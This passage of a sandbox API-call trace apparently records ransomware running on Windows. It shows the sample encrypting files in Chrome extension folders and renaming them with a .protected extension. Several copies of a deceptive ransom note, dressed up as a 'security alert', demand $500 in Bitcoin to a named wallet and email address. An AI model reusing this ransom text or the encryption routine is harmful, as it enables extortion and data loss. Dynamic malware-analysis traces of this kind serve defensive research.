(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.246] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.246] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.246] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.246] CloseHandle (hObject=0x164) returned 1 [0081.246] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.246] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0081.247] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0081.247] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0081.247] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0081.247] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0081.247] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi") returned 145 [0081.247] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0081.247] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0081.247] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\*") returned 147 [0081.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.247] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.247] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.247] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.247] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.247] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.247] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\.") returned 147 [0081.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.247] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.247] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.247] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.247] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.248] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.248] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.248] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\..") returned 148 [0081.248] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.248] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.248] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.248] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.248] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.248] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.248] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.248] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.248] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json") returned 159 [0081.248] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.248] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json") returned 159 [0081.249] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json") returned 159 [0081.249] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json") returned 159 [0081.249] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.249] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2d0, lpOverlapped=0x0) returned 1 [0081.251] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.251] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2d0, lpOverlapped=0x0) returned 1 [0081.251] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.251] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.251] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.251] CloseHandle (hObject=0x168) returned 1 [0081.252] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.protected") returned 169 [0081.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.protected")) returned 1 [0081.253] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.253] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.253] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\RESTORE_FILES.txt") returned 163 [0081.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.254] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.254] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.255] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.255] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.255] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.255] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.255] CloseHandle (hObject=0x164) returned 1 [0081.255] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.255] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0081.255] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0081.255] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0081.255] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0081.255] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0081.255] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN") returned 148 [0081.255] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0081.255] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0081.255] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\*") returned 150 [0081.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.256] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.256] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.256] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.256] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.256] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\.") returned 150 [0081.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.256] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.256] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.256] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.256] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.256] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.256] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\..") returned 151 [0081.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.256] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.256] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.256] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.256] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.256] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.256] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.256] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json") returned 162 [0081.256] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.256] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.257] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.257] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.257] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json") returned 162 [0081.257] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.257] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json") returned 162 [0081.257] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.257] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json") returned 162 [0081.257] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.257] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x253, lpOverlapped=0x0) returned 1 [0081.259] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffdad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.259] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x253, lpOverlapped=0x0) returned 1 [0081.259] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.260] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.260] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.260] CloseHandle (hObject=0x168) returned 1 [0081.260] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.protected") returned 172 [0081.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0081.261] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.261] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.261] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 166 [0081.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.262] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.262] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.263] lstrlenA 